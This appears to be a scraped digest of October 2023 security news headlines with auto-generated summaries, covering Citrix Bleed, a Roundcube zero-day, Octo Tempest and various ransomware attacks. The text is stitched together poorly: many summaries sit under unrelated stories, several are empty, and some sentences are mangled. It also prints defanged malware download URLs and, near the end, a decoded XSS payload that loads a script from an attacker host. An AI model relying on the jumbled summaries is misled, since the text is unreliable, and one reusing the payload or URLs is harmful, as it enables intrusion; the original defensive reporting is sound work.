The post StripedFly, a complex malware that infected one million devices without being noticed appeared first on Security Affairs.
"Autosummary:
The malware uses the modules for storing its configuration, upgrading and uninstalling itself, establishing a reverse proxy, harvesting credentials, performing reconnaissance and files, taking screenshots, executing processes, recording microphone input, and mining for Monero. "CVE-2023-4966, aka “Citrix Bleed”, a critical information disclosure vulnerability affecting Citrix NetScaler ADC/Gateway devices, is being massively exploited by threat actors. According to security researcher Kevin Beaumont’s cybersecurity industry sources, one ransomware group has already distributed a Python script to automate the attack chain to their operators, and other groups have started leveraging a working exploit. CVE-2023-4966 exploited Threat actors have been quick to leverage vulnerabilities in Citrix NetScaler ADC in the past, and this … More
The post Citrix Bleed: Mass exploitation in progress (CVE-2023-4966) appeared first on Help Net Security.
"Autosummary:
A week later, Mandiant researchers revealed that the vulnerability has been exploited as a zero-day by attackers since late August 2023, to attack professional services, technology, and government organizations. "Autosummary:
"As a result of this, the threat actor associated with the campaign was able to create multiple AWS Elastic Compute (EC2) instances that they used for wide-ranging and long-lasting cryptojacking operations," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said in a technical report shared with The Hacker News. "HackerOne announced that it has awarded over $300 million bug hunters as part of its bug bounty programs since the launch of its platform. HackerOne announced that it has surpassed $300 million in total all-time rewards on the HackerOne platform. Thirty white hat hackers have earned more than one million dollars submitting vulnerabilities through the […]
The post HackerOne awarded over $300 million bug hunters appeared first on Security Affairs.
"Autosummary:
HackerOne awarded over $300 million bug hunters Pierluigi Paganini October 30, 2023 October 30, 2023 HackerOne announced that it has awarded over $300 million bug hunters as part of its bug bounty programs since the launch of its platform. "Autosummary:
"Autosummary:
The malware reveals its true nature by not dropping a ransom note or providing victims with a way to reach out to the attackers to negotiate payment for a decryptor, even though it fakes file encryption, "This new threat does not establish communication with remote Command & Control (C2) servers for data exfiltration, employ reversible encryption algorithms, or leave ransom notes as a means to coerce victims into making payments," said Security Joes. "Autosummary:
"This app was detected sending SMS privately, enticing users to pay with adult content, downloading/installing apps privately, or stealing private information, which may cause property damage and privacy leakage," reads the security alert details. "F5 Networks has released hotfixes for three vulnerabilities affecting its BIG-IP multi-purpose networking devices/modules, including a critical authentication bypass vulnerability (CVE-2023-46747) that could lead to unauthenticated remote code execution (RCE). About CVE-2023-46747 Discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security, CVE-2023-46747 is a request smuggling bug in the Apache JServ Protocol (AJP) used by the vulnerable devices. “This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system … More
The post F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747) appeared first on Help Net Security.
"Autosummary:
It affects the following versions of all BIG-IP modules: 17.1.0 16.1.0 – 16.1.4 15.1.0 – 15.1.10 14.1.0 – 14.1.5 13.1.0 – 13.1.5 Fixes and mitigations F5’s BIG-IP devices are used by governments, ISPs, telecoms, cloud service providers and other big enterprises around the world to manage and inspect network and application traffic. "Autosummary:
"While the string "bibi" (in the filename), may appear random, it holds significant meaning when mixed with topics such as politics in the Middle East, as it is a common nickname used for the Israeli Prime Minister, Benjamin Netanyahu," the cybersecurity company added. "Autosummary:
Wyze Cam v3 is a top-selling, inexpensive indoor/outdoor security camera with support for color night vision, SD card storage, cloud connectivity for smartphone control, IP65 weatherproofing, and more. "Autosummary:
Such entities include mortgage brokers, motor vehicle dealers, payday lenders, investment firms, insurance companies, peer-to-peer lenders, and asset management firms. "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: GOAD: Vulnerable Active Directory environment for practicing attack techniques Game of Active Directory (GOAD) is a free pentesting lab. It provides a vulnerable Active Directory environment for pen testers to practice common attack methods. “Disappearing” implants, followed by first fixes for exploited Cisco IOS XE zero-day Cisco has released the first fixes for the IOS XE zero-day (CVE-2023-20198) exploited by … More
The post Week in review: VMware patches critical vulnerability, 1Password affected by Okta breach appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: October 27, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Darktrace, Data Theorem, Jumio, Malwarebytes, Progress, and Wazuh. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Hunters International ransomware leaks data of one victim source: BleepingComputer As spotted by MalwareHunterTeam, Hunters International"s data leak site shows a set of messages, likely in an attempt to share with the world that they mean serious business and "hunting" for victims and extorting them is their main purpose. "Categories: Threat Intelligence Tags: malvertising Tags: ads Tags: google Tags: dynamic search ads Tags: python Tags: pycharm Tags: malware Dynamically generated ads can be problematic when the content they are created from has been compromised. |
The post "Accidental" malvertising via Dynamic Search Ads delivers malware frenzy appeared first on Malwarebytes Labs.
"Autosummary:
Malwarebytes already detected all the payloads with its anti-malware and heuristic engines: Indicators of Compromise Download URL for fake serial: eplangocview[.]com/wp-download/File.7z Subsequent malware download URLs: roberthamilton[.]top/timeSync[.]exe 109[.]107[.]182[.]2/race/bus50[.]exe 171[.]22[.]28[.]226/download/Services[.]exe experiment[.]pw/setup294[.]exe medfioytrkdkcodlskeej[.]net/987123[.]exe 171[.]22[.]28[.]226/download/WWW14_64[.]exe 185[.]172[.]128[.]69/newumma[.]exe 194[.]169[.]175[.]233/setup[.]exe 171[.]22[.]28[.]221/files/Ads[.]exe 171[.]22[.]28[.]213/3[.]exe lakuiksong[.]known[.]co[.]ke/netTimer[.]exe stim[.]graspalace[.]com/order/tuc19[.]exe neuralshit[.]net/1298d7c8d865df39937f1b0eb46c0e3f/7725eaa6592c80f8124e769b4e8a07f7[.]exe pic[.]himanfast[.]com/order/tuc15[.]exe 85[.]217[.]144[.]143/files/My2[.]exe galandskiyher5[.]com/downloads/toolspub1[.]exe gobr1on[.]top/build[.]exe flyawayaero[.]net/baf14778c246e15550645e30ba78ce1c[.]exe 632432[.]space/385118/setup[.]exe yip[.]su/RNWPd[.]exe potatogoose[.]com/1298d7c8d865df39937f1b0eb46c0e3f/baf14778c246e15550645e30ba78ce1c[.]exe 185[.]216[.]71[.]26/download/k/KL[.]exe walkinglate[.]com/watchdog/watchdog[.]exe walkinglate[.]com/uninstall[.]exeFor example, the screenshot below shows that overlay advertising a license key for Pycharm, a popular program used by software developers: Malvertising via Dynamic Search Ad Dynamic Search Ads (DSA) are a type of Google ads that use the content of a website to automate the creation of ads. "The Pwn2Own Toronto 2023 hacking competition is over, bug hunters earned $1,038,500 for 58 zero-day exploits. The Pwn2Own Toronto 2023 hacking competition is over, the organizers awarded $1,038,250 for 58 unique 0-days. The Team Viettel (@vcslab) won the Master of Pwn with $180K and 30 points. The vulnerabilities exploited by the experts have been disclosed […]
The post Bug hunters earned $1,038,250 for 58 unique 0-days at Pwn2Own Toronto 2023 appeared first on Security Affairs.
"Autosummary:
Bug hunters earned $1,038,250 for 58 unique 0-days at Pwn2Own Toronto 2023 Pierluigi Paganini October 28, 2023 October 28, 2023 The Pwn2Own Toronto 2023 hacking competition is over, bug hunters earned $1,038,500 for 58 zero-day exploits. "Autosummary:
Areas ethical hackers focused their efforts this year (HackerOne) Other opinions recorded in the report include motivation and discouraging factors, with bounties playing the biggest (73%) role in participating, followed by an abundance of flaws (50%), opportunity to learn (45%), varied scope (46%), and quick payments (42%). "Autosummary:
"The high number of attacks on IoT devices represents a 400% increase in malware compared to the previous year, according to Zscaler. The increasing frequency of malware attacks targeting IoT devices is a significant concern for OT security, as the mobility of malware can facilitate movement across different networks, potentially endangering critical OT infrastructure. ThreatLabz focused on understanding IoT device activity and attributes via device fingerprinting and analyzing the IoT malware threat landscape. As more … More
The post IoT security threats highlight the need for zero trust principles appeared first on Help Net Security.
"Autosummary:
IoT malware threatens industrial manufacturing OT processes Manufacturing and retail accounted for nearly 52% of IoT device traffic, with 3D printers, geolocation trackers, industrial control devices, automotive multimedia systems, data collection terminals, and payment terminals sending the majority of signals over digital networks. "Consumers are ready for the next wave of payment technology, including deployment of AI-driven biometrics to verify identity in digital-first account opening processes, according to Entrust. The key to future payment solutions 63% of respondents indicated that they are comfortable with AI helping their bank detect fraud. Almost half of respondents abandoned a new bank account application after starting because it didn’t feel secure or was too cumbersome. The new wave of technology needs to … More
The post AI strengthens banking’s defense against fraud appeared first on Help Net Security.
"Autosummary:
78% of respondents indicated they would prefer to do their basic daily banking online including making deposits or withdrawals, applying for a credit card, and opening a checking, savings or investment account. "Autosummary:
"On Wednesday, Apple released security updates for all supported branches of iOS and iPadOS, macOS, tvOS, watchOS and Safari. This time around, the updates did not garner as much attention as when they deliver a zero-day fix, though it has to be mentioned that the company has finally delivered a patch for CVE-2023-32434, a code execution vulnerability exploited to deliver the extremely stealthy TriangleDB spyware, to the currentlu oldest supported iOS/iPadOS branch (15.x). MAC address … More
The post Apple news: iLeakage attack, MAC address leakage bug appeared first on Help Net Security.
"Autosummary:
MAC address leakage Another vulnerability of note fixed this Wednesday with the release of iOS 17.1 and iPadOS 17.1, iOS 16.7.2 and iPadOS 16.7.2, tvOS 17.1 and watchOS 10.1 is CVE-2023-42846, a bug that made a privacy-enhancing feature (“Private Wi-Fi Address”) not work as intended. "Autosummary:
"Autosummary:
Malware loading process (Kaspersky) LPEClient is an info-stealer and malware loader on itself, which, in its latest versions, Kaspersky says demonstrates significant evolution compared to previously documented samples. "Autosummary:
"Autosummary:
We also learned of new cyberattacks or more information was shared about existing ones, including: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @LawrenceAbrams, @billtoulas, @Ionut_Ilascu, @demonslay335, @fwosar, @BleepinComputer, @serghei, @malwrhunterteam, @Avast, @kaspersky, @1ZRR4H, @NCCGroupplc, @Imperva, @Webroot, @MsftSecIntel, @pcrisk, @BushidoToken, @BrettCallow, and @security_score." Octo Tempest is also known as Scattered Spider, Oktapus, and UNC3944 and is believed to be behind recent ransomware attacks on MGM Resorts and Caesars and past attacks on Reddit, MailChimp, Twilio, DoorDash, and Riot Games. "The Lockbit ransomware gang claims to have hacked the aerospace manufacturer and defense contractor Boeing and threatened to leak the stolen data. The Boeing Company, commonly known as Boeing, is one of the world’s largest aerospace manufacturers and defense contractors. In 2022, Boeing recorded $66.61 billion in sales, the aerospace giant has 156,000 (2022). The Lockbit ransomware […]
The post Lockbit ransomware gang claims to have stolen data from Boeing appeared first on Security Affairs.
"Autosummary:
“Boeing, the 60 billion Company, together with its subsidiaries, designs, develops, manufactures, sells, services, and supports commercial jetliners, military aircraft, satellites, missile defense, human space flight, and launch systems and services worldwide.” "Categories: News Categories: Ransomware Tags: ALPHV Tags: Octo Tempest Tags: RaaS Tags: LOTL Tags: social engineering Tags: SIM swapping A group of cybercriminals known for advanced social engineering attacks has joined one of the biggest ransomware groups as an affiliate. |
The post Octo Tempest cybercriminal group is "a growing concern"—Microsoft appeared first on Malwarebytes Labs.
"Autosummary:
Microsoft reports that in doing so, Octo Tempest progressively broadened the number of industries it targeted for extortion, including natural resources, gaming, hospitality, consumer products, retail, managed service providers, manufacturing, law, technology, and financial services.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Since then the group has expanded its range of activities to include targeting organizations providing cable telecommunications, email, and tech services, and partnering with the ALPHV/BlackCat ransomware group. "The sharp increase in attacks on operational technology (OT) systems can be primarily attributed to two key factors: the escalating global threats posed by nation-state actors and the active involvement of profit-driven cybercriminals (often sponsored by the former). The lack of success on the defense side can be attributed to several factors: the complexity of OT environments, the convergence of information technology (IT) and OT, insider attacks, supply chain vulnerabilities, and others. Despite increased cybersecurity … More
The post OT cyber attacks proliferating despite growing cybersecurity spend appeared first on Help Net Security.
"Autosummary:
The advent of cyber physical systems With the convergence of IT, OT, IoT (Internet of Things), and IIoT (Industrial Internet of Things), cyber physical systems (CPS) emerged. Since cyber-attacks and human errors can come from the outside, inside, supply chain, and other contracted third parties, a network-based anomaly detection solution would not cover all the bases. "Q3 of 2023 continued an ongoing surge in ransomware activity, according to GuidePoint Security. GuidePoint Research and Intelligence Team (GRIT) observed a nearly 15% increase in ransomware activity since Q2 due to an increased number of ransomware groups, including 10 new emerging groups tracked during this quarter. In the third quarter, GRIT tracked 1,353 publicly posted ransomware victims claimed by 46 different threat groups. Through the first three quarters of 2023, GRIT has tracked a … More
The post Ransomware groups continue to increase their operational tempo appeared first on Help Net Security.
"Autosummary:
LockBit, Cl0p, and Alphv lead ransomware activity in Q3 2023 The top three most active ransomware groups were Lockbit, Cl0p, and Alphv. "Autosummary:
"Russia-linked threat actor Winter Vivern has been observed exploiting a zero-day flaw in Roundcube webmail software. Russian APT group Winter Vivern (aka TA473) has been observed exploiting a zero-day flaw in Roundcube webmail software on October 11, 2023. ESET researchers pointed out that is a different vulnerability than CVE-2020-35730, that the group exploited in other attacks. The Winter […]
The post Winter Vivern APT exploited zero-day in Roundcube webmail software in recent attacks appeared first on Security Affairs.
"Autosummary:
Winter Vivern APT exploited zero-day in Roundcube webmail software in recent attacks Pierluigi Paganini October 26, 2023 October 26, 2023 Russia-linked threat actor Winter Vivern has been observed exploiting a zero-day flaw in Roundcube webmail software. "Autosummary:
ASVEL, which has brought in third-party experts to help with its response to the ttack, says that its club activities have not been disrupted, and that - so far - it has not seen evidence that fans" payment information has been compromised. "Humans are still better at crafting phishing emails compared to AI, but not by far and likely not for long, according to research conducted by IBM X-Force Red. Creating phishing emails: Humans vs. AI The researchers wanted to see whether ChatGPT is as capable of writing a “good” phishing email as attackers are. “As someone who writes phishing emails for a living, I was excited to find out the answer,” said Stephanie Carruthers, Chief People … More
The post Humans are still better than AI at crafting phishing emails, but for how long? appeared first on Help Net Security.
"Autosummary:
(Source: IBM X-Force Red) Concurrently, X-Force Red social engineers crafted their own phishing email, after using OSINT techniques to gather information that would help them choose the sender to impersonate and decide on the lure (an internal company survey). "Seemplicity announced its technical integration with cloud security provider Wiz. As a certified Wiz Integration (WIN) platform partner, Seemplicity enables joint customers to seamlessly integrate its Security Remediation Operations platform into their existing Wiz workflows to accelerate remediation. “Today security teams manage an overwhelming number of findings from an ever-growing security testing tech stack, making efficient risk and vulnerability remediation a near-impossible task,” said Yoran Sirkis, CEO of Seemplicity. “Ad-hoc processes, unidentified remediation teams, and … More
The post Seemplicity integrates with Wiz to accelerate remediation appeared first on Help Net Security.
"Autosummary:
"Japanese watchmaker Seiko revealed that the attack that suffered earlier this year was carried out by the Black Cat ransomware gang. On August 10, 2023, the Japanese maker of watches Seiko disclosed a data breach following a cyber attack. “Seiko Group Corporation (hereinafter referred to as “the Company” or “we”) has confirmed that on July […]
The post Seiko confirmed a data breach after BlackCat attack appeared first on Security Affairs.
"Autosummary:
Leaked information includes: SWC customer information, including names, addresses, telephone numbers, and/or email addresses (Note: credit card information was not compromised) Contact information for counterparties involved in business transactions with SGC, SWC, and/or SII, including the individual’s name, company affiliation, job title, company address, company phone number, and/or company email address Information supplied by applicants for employment with SGC and/or SWC, including names, addresses, phone numbers, email addresses, and/or educational background information Personnel information, including names and/or email addresses, for both current and former employees of SGC and its group companies Financial information, such as credit card information, of Seiko Watch customers was not exposed in the security breach. "Autosummary:
ANSSI also reports that APT28 uses a range of VPN clients, including SurfShark, ExpressVPN, ProtonVPN, PureVPN, NordVPN, CactusVPN, WorldVPN, and VPNSecure. "Autosummary:
After investigating the injected code, they determined it downloads and executes additional files, such as PowerShell scripts, from legitimate hosting services like Bitbucket, GitHub, and GitLab, including PowerShell scripts.It achieves persistence using systemd services, an autostarting .desktop file, or by modifying various profile and startup files, such as /etc/rc*, profile, bashrc, or inittab files. "The malware payload encompasses multiple modules, enabling the actor to perform as an APT, as a crypto miner, and even as a ransomware group," reads Kaspersky"s report. "Autosummary:
Octo Tempest has since diversified its targeting to include email and tech service providers, gaming, hospitality, retail, managed service providers (MSPs), manufacturing, technology, and financial sectors, while simultaneously emerging as an affiliate for the BlackCat ransomware gang in mid-2023 to extort victims. "Autosummary:
" Some of the top industries targeted by HTTP DDoS attacks include gaming, IT, cryptocurrency, computer software, and telecom, with the U.S., China, Brazil, Germany, and Indonesia accounting for the biggest sources of application layer (L7) DDoS attacks. "Autosummary:
"Autosummary:
News of iLeakage comes months after cybersecurity researchers revealed details of a trifecta of side-channel attacks – Collide+Power (CVE-2023-20583), Downfall (CVE-2022-40982), and Inception (CVE-2023-20569) – that could be exploited to leak sensitive data from modern CPUs. "Boffins devised a new iLeakage side-channel speculative execution attack exploits Safari to steal sensitive data from Macs, iPhones, and iPads. A team of researchers from the University of Michigan, Georgia Institute of Technology, and Ruhr University Bochum has devised a transient side-channel speculative execution attack that exploits the Safari web browser to steal sensitive information […]
The post iLeakage attack exploits Safari to steal data from Apple devices appeared first on Security Affairs.
"Autosummary:
A team of researchers from the University of Michigan, Georgia Institute of Technology, and Ruhr University Bochum has devised a transient side-channel speculative execution attack that exploits the Safari web browser to steal sensitive information from Macs, iPhones and iPad iLeakage is a new Spectre-like side-channel attack, the researchers demonstrated that an attacker can induce Safari to render an arbitrary webpage, and then recovers sensitive information present within it using speculative execution. "Autosummary:
The researchers provide the following additional tools and techniques that Octo Tempest uses in their attacks: open-source tools: ScreenConnect, FleetDeck, AnyDesk, RustDesk, Splashtop, Pulseway, TightVNC, LummaC2, Level.io, Mesh, TacticalRMM, Tailscale, Ngrok, WsTunnel, Rsocx, and Socat deploying Azure virtual machines to enable remote access via RMM installation or modification to existing resources via Azure serial console adding MFA methods to existing users using the tunneling tool Twingate, which leverages Azure Container instances as a private connector (without public network exposure) “This is notable in that, historically, Eastern European ransomware groups refused to do business with native English-speaking criminals” - Microsoft The more recent attacks from this group target organizations in a variety of sectors, including gaming, natural resources, hospitality, consumer products, retail, managed service providers, manufacturing, law, technology, and financial services. "Categories: Exploits and vulnerabilities Categories: News Apple has fixed a bunch of security flaws, but not iLeakage, a side-channel vulnerability in Safari. |
The post Patch...later? Safari iLeakage bug not fixed appeared first on Malwarebytes Labs.
"Autosummary:
According to the researchers, the super-secure Lock Down mode that"s available on Apple"s Macs, phones, and tablets will disable iLeakage, but Lock Down mode can impact performance and, as Apple points out, "When Lockdown Mode is enabled, your device won’t function like it typically does. "Autosummary:
"Autosummary:
"The newly released Security and Exchange Commission (SEC) cyber incident disclosure rules have been met with mixed reviews. Of particular concern is whether public companies who own and operate industrial control systems and connected IoT infrastructure are prepared to fully define operational risk, and therefore are equipped to fully disclose material business risk from cyber incidents. This concern also provides a fresh opportunity for preparedness. The rules require registrants to disclose material cybersecurity incidents (via … More
The post What is operational risk and why should you care? Assessing SEC rule readiness for OT and IoT appeared first on Help Net Security.
"Autosummary:
Security teams at public companies who have identified and outlined their operational risk and critical assets have three key objectives before December 15: to understand operational risk and map it to their company’s definitions of materiality to evaluate and take stock of OT/IoT assets not covered by existing IT security controls or capabilities to incorporate both assessments into reporting requirements outlined in the SEC rule for describing how the organization assesses, identifies, and manages material risks Avoiding vs. mitigating operational risk The reactive nature of cybersecurity has led to a reality in which boards and executive leaders attempt to mitigate risk by tasking security teams to avoid risk. Once critical assets are identified, they need to be categorized or inventoried, because your team will be incapable of performing root cause analysis on any asset that is not accounted for, monitored, baselined, hardened, or queried. "Many CISOs may believe their cybersecurity defenses are robust enough to repel any attack, but there are critical misconceptions they may be harboring. In this Help Net Security video, Kevin Kirkwood, Deputy CISO at LogRhythm, stresses that one of the most significant pitfalls is the assumption that their defenses are “good enough.” He believes this complacency can lead to a dangerous sense of security, leaving organizations vulnerable to evolving ransomware threats. The reality is that … More
The post Strategies to overcome cybersecurity misconceptions appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The latest developments also follow the release of updates for three critical remote code execution vulnerabilities in SolarWinds Access Rights Manager (CVE-2023-35182, CVE-2023-35185, and CVE-2023-35187, CVSS scores: 9.8) that remote attackers could use to run code with SYSTEM privileges. "The Winter Vivern APT group has been exploiting a zero-day vulnerability (CVE-2023-5631) in Roundcube webmail servers to spy on email communications of European governmental entities and a think tank, according to ESET researchers. “Exploitation of the XSS vulnerability can be done remotely by sending a specially crafted email message,” the researchers noted. “No manual interaction other than viewing the message in a web browser is required.” Exploting CVE-2023-5631 Roundcube is an open-source browser-based email client … More
The post Roundcube webmail zero-day exploited to spy on government entities (CVE-2023-5631) appeared first on Help Net Security.
"Autosummary:
CVE-2023-5631 is a cross-site scripting (XSS) vulnerability in Roundcube’s server-side script rcube_washtml.php, which can be triggered to load arbitrary JavaScript code via an HTML e-mail message with a specially crafted SVG document. "VMware has fixed a critical out-of-bounds write vulnerability (CVE-2023-34048) and a moderate-severity information disclosure flaw (CVE-2023-34056) in vCenter Server, its popular server management software. About CVE-2023-34048 and CVE-2023-34056 CVE-2023-34048 allows an attacker with network access to a vulnerable vCenter Server virtual appliance to trigger an out-of-bounds write that can lead to remote code execution. It has been reported by Grigory Dorodnov of Trend Micro Zero Day Initiative and there are no indications of it being … More
The post VMware patches critical vulnerability in vCenter Server (CVE-2023-34048) appeared first on Help Net Security.
"Autosummary:
VMware has fixed a critical out-of-bounds write vulnerability (CVE-2023-34048) and a moderate-severity information disclosure flaw (CVE-2023-34056) in vCenter Server, its popular server management software. "Autosummary:
Each offer distinct advantages and trade-offs: Cloud Trail Data Events: offer visibility into resource operations performed on or within a resource in real-time, but comes with potential cost implications due to high API call volumes Server Access Logs: free access to records for each request made to your S3 bucket, but come with potential delays in log availability and potential logging with less integrity. Despite S3 being a secure service from a reputable provider, its pivotal role in handling vast amounts of sensitive data (customer personal information, financial data, intellectual property, etc.), provides a juicy target for threat actors. "Autosummary:
"Autosummary:
The latest to join the stealer ecosystem is Lumar, which was first advertised by a user named Collector on cybercrime forums, marketing its capabilities to capture Telegram sessions, harvest browser cookies and passwords, retrieve files, and extract data from crypto wallets. "Despite having all these functionalities, the malware is relatively small in terms of size (only 50 KB), which is partly due to the fact that it is written in C," Kaspersky noted. "Citrix warned of attacks actively exploiting the vulnerability CVE-2023-4966 in NetScaler ADC and Gateway appliances. Citrix is urging administrators to secure all NetScaler ADC and Gateway appliances against the CVE-2023-4966 vulnerability, which is actively exploited in attacks. On October 10, Citrix published a security bulletin related to a critical vulnerability, tracked as CVE-2023-4966, in Citrix NetScaler ADC/Gateway devices. […]
The post Citrix warns admins to patch NetScaler CVE-2023-4966 bug immediately appeared first on Security Affairs.
"Autosummary:
“Cloud Software Group strongly urges customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible: NetScaler ADC and NetScaler Gateway 14.1-8.50 and later releases NetScaler ADC and NetScaler Gateway 13.1-49.15 and later releases of 13.1 NetScaler ADC and NetScaler Gateway 13.0-92.19 and later releases of 13.0 NetScaler ADC 13.1-FIPS 13.1-37.164 and later releases of 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1-55.300 and later releases of 12.1-FIPS NetScaler ADC 12.1-NDcPP 12.1-55.300 and later releases of 12.1-NDcPP Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL). "Autosummary:
"Autosummary:
The Citrix Bleed flaw The CVE-2023-4966 Citrix Bleed flaw is an unauthenticated buffer-related vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway, network devices used for load balancing, firewall implementation, traffic management, VPN, and user authentication. "Autosummary:
Recent ransomware attacks Almost every day, we hear in the news about a major ransomware incident that hit a major organization; here are some recent ransomware incidents: The LockBit ransomware group launched a ransomware attack against Oakland city in April 2023, ceasing 311 public service The Royal ransomware hit the city of Dallas IT infrastructure, resulting in ceasing many public services and exposing the personal information of 26,212 residents of Texas The ransomware attack against Harvard Pilgrim Health Care in April 2023 resulted in accessing 2,550,922 of patients" medical data Ransomware gangs are using more advanced techniques to infect their targets The huge profits gained from ransomware attacks have made it a lucrative method for cybercriminals to earn money. To halt ransomware attacks that take advantage of end-users weak password practices, it is advisable to use Specops Password Policy, which extends the functionality of Group Policy in Active Directory and provides advanced password policy features, including: Custom dictionary list to block the use of passwords that can be commonly used in your organization, like company name and location Settings to combat predictable composition patterns like reusing part of the old password, consecutive characters, and incremental characters Breached password protection with daily checks to block the use of over 4 billion unique compromised passwords found on known breached lists Passphrase support Ransomware continues to evolve as a preferred cybercriminal business model. "Autosummary:
" Roundcube phishing email sample (ESET) First spotted in April 2021, Winter Vivern has garnered attention for its deliberate targeting of government entities across the globe, including nations such as India, Italy, Lithuania, Ukraine, and the Vatican. "Malwarebytes launched a new consumer solution, Identity Theft Protection. The new service helps individuals secure their digital identities and defend against identity and online threats. Malwarebytes Identity Theft Protection includes real-time identity monitoring and alerts,credit protection and reporting and live agent-supported identity recovery and resolution services – backed by up to a $2 million identity theft insurance policy. The new service, paired with Malwarebytes’ antivirus and VPN software, helps prevent criminals from stealing or using … More
The post Malwarebytes Identity Theft Protection defends users against online threats appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"We understand the importance of proactive and fluid communication in the face of incidents, therefore, in accordance with what we previously discussed on the phone, I would like to inform you that we are experiencing a partial impact on services as a result of a cybersecurity incident," reads a GTD security incident notification. On the morning of October 23rd, GTD suffered a cyberattack that impacted numerous services, including its data centers, internet access, and Voice-over-IP (VoIP). "Categories: Business Categories: Exploits and vulnerabilities Categories: News Tags: VMWare Tags: vCenter Server Tags: CVE-2023-34056 Tags: CVE-2023-34048 Tags: DCE/RPC Tags: out of bounds write Tags: information disclosure Tags: remote code execution VMWare has issued an update to address out-of-bounds write and information disclosure vulnerabilities in its server management software, vCenter Server. |
The post Update vCenter Server now! VMWare fixes critical vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
Fixed version(s) and release notes: VMware vCenter Server 8.0U2 Downloads and Documentation: https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U2&productId=1345&rPId=110105 VMware vCenter Server 8.0U1d Downloads and Documentation: https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U1D&productId=1345&rPId=112378 VMware vCenter Server 7.0U3o Downloads and Documentation: https://customerconnect.vmware.com/downloads/details?downloadGroup=VC70U3O&productId=974&rPId=110262 Cloud Foundation 5.x/4.x https://kb.vmware.com/s/article/88287 VMWare also published an FAQ about this update. "Categories: News Tags: Transform Tags: service provider Tags: 5 hospitals Tags: Canada Tags: cyberattack A cyberattack on shared service provider TransForm has impacted operations in five Canadian hospitals. |
The post Cyberattack hits 5 hospitals appeared first on Malwarebytes Labs.
"Autosummary:
The five affected hospitals, Bluewater Health, Chatham Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, and Windsor Regional Hospital, have had to reschedule appointments with their patients due to the attack. "Categories: Personal In today’s hyper-connected world, Malwarebytes now protects your identity, reputation, and credit all in one place, so you can focus on living your life. |
The post Announcing NEW Malwarebytes Identity Theft Protection appeared first on Malwarebytes Labs.
"Autosummary:
Here’s what you get (based on your selected plan): Ongoing monitoring: Peace of mind that we are actively working in the background to keep you safe Real-time alerts: Immediate notifications if we identify suspicious activity Recommendations and best practices: Advice on how to prevent identity theft, and help if it happens Identity restoration helpline and top-notch customer support. "Autosummary:
Malicious email message At first sight, the email doesn’t seem malicious – but if we examine the HTML source code, shown in Figure 2, we can see an SVG tag at the end, which contains a base64-encoded payload.Decoding the payload in the onerror attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed in the browser of the victim in the context of their Roundcube session: var fe=document.createElement("script");fe.src="https://recsecas[.]com/controlserver/checkupdate.js";document.body.appendChild(fe); Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance.ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible ESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group began exploiting a zero-day XSS vulnerability in the Roundcube Webmail server on October 11th, 2023. "Autosummary:
"Autosummary:
"Autosummary:
"AI has been the shiniest thing in tech since at least November 2022, when ChatGPT was made available to the masses and unveiled the transformative potential of large language models for all the world to see. As businesses scramble to take the lead in operationalizing AI-enabled interfaces, ransomware actors will use it to scale their operations, widen their profit margins, and increase their likelihood of pulling off successful attacks. As a result, an already sophisticated … More
The post Bracing for AI-enabled ransomware and cyber extortion attacks appeared first on Help Net Security.
"Autosummary:
Eliminate lateral movement – AI-powered policy recommendation based on training data from millions of leveraging private app telemetry, user context, behavior, and location will simplify the process of user-to-app segmentation – AI-powered policy recommendation based on training data from millions of leveraging private app telemetry, user context, behavior, and location will simplify the process of user-to-app segmentation Stop data loss – AI-assisted data classification will help organizations tag sensitive data and enforce strict controls against uploading it to cloud storage. In a dark parody of legitimate organizations, in the coming years ransomware groups may use chatbots and other AI-enabled tools to: Use AI voice cloning for voice-based phishing (a.k.a., vishing) attacks to impersonate employees to gain privileged access Tailor email-based phishing attacks with native language accuracy in multiple languages Discover and identify zero-day vulnerabilities that can be leveraged for initial access Reduce the time required to develop malicious code and lower the bar for entry When AI-enabled capabilities are coupled with potent malware, we should expect cybercriminals to double down on ransomware as a means of generating revenue rather than abandoning it in favor of something new. "The Spanish police have arrested 34 members of the cybercriminal group that is accused of having stolen data of over four million individuals. The Spanish police have arrested 34 members of a cybercriminal group that is suspected to have stolen data of over four million individuals. The authorities conducted 16 searches in Madrid, Málaga, Huelva, […]
The post Spain police dismantled a cybercriminal group who stole the data of 4 million individuals appeared first on Security Affairs.
"Autosummary:
"Ivanti released new capabilities for the Ivanti Neurons platform to improve the digital employee experience, offer scalability to customers and enhance vulnerability prioritization and remediation. With this release, Ivanti continues to deliver on its mission to empower IT and Security teams with a 360-degree view of their entire IT estate – providing visibility, actionable insights and security. “We are dedicated to building technologies that enable a seamless, secure workplace for employees,” said Dr. Srinivas Mukkamala, … More
The post Ivanti’s new capabilities simplify vulnerability prioritization and remediation appeared first on Help Net Security.
"Autosummary:
